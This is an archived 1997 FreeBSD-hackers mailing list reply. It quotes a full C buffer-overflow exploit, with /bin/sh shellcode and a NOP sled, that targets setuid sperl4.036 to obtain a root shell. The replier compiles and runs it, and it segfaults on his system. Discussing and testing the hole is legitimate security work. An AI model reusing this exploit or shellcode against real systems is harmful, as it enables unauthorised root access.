Date: Wed, 6 Aug 1997 10:01:08 +0930 (CST) From: Greg Lehey <grog@lemis.com> To: lenzi@bsi.com.br (Lenzi, Sergio) Cc: hackers@FreeBSD.ORG Subject: Re: Security hole script. Message-ID: <199708060031.KAA00549@freebie.lemis.com> In-Reply-To: <Pine.BSF.3.96.970804100920.6279A-100000@sergio> from "Lenzi, Sergio" at "Aug 4, 97 10:12:18 am"
next in thread | previous in thread | raw e-mail | index | archive | help
Lenzi, Sergio writes:
>
>
> Hello all.
>
> Here is the "script" that opens a hole in our FreeBSD 2.2.2...
>
> from a friend of mine (lgarcia@netlan.com.br)
> ---------------------------cut-------------------------------
> #include <stdio.h>
> #include <stdlib.h>
> #include <unistd.h>
>
> #define BUFFER_SIZE 1400
> #define OFFSET 600
>
> char *get_esp(void) {
> asm("movl %esp,%eax");
> }
> char buf[BUFFER_SIZE];
>
> main(int argc, char *argv[])
> {
> int i;
> char execshell[] =
> "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
> "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
> "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
> "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
>
> for(i=0+1;i<BUFFER_SIZE-4;i+=4)
> *(char **)&buf[i] = get_esp() - OFFSET;
>
> memset(buf,0x90,768+1);
> memcpy(&buf[768+1],execshell,strlen(execshell));
>
> buf[BUFFER_SIZE-1]=0;
>
> execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
> }
>
> ---------------------------------------------------------cut---------
>
> install this script, do a make and run it.
>
> should return a root shell.
=== grog@freebie (/dev/ttyp1) ~/src 2 -> make crackopen
gcc -g -Wall crackopen.c -lm -o crackopen
crackopen.c: In function `get_esp':
crackopen.c:10: warning: control reaches end of non-void function
crackopen.c: At top level:
crackopen.c:14: warning: return-type defaults to `int'
crackopen.c: In function `main':
crackopen.c:25: warning: implicit declaration of function `memset'
crackopen.c:31: warning: control reaches end of non-void function
=== grog@freebie (/dev/ttyp1) ~/src 3 -> crackopen
Can't open perl script "ë#^^
1ÒVVVV1À°;N
ÊRQSPëèØÿÿÿ/bin/sh4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï": File name too long
Segmentation fault
=== grog@freebie (/dev/ttyp1) ~/src 4 ->
I presume this means that mine isn't vulnerable.
Greg
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199708060031.KAA00549>